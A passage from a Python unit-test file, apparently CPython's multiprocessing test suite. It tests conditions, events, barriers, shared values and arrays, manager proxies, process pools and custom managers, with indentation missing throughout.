with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
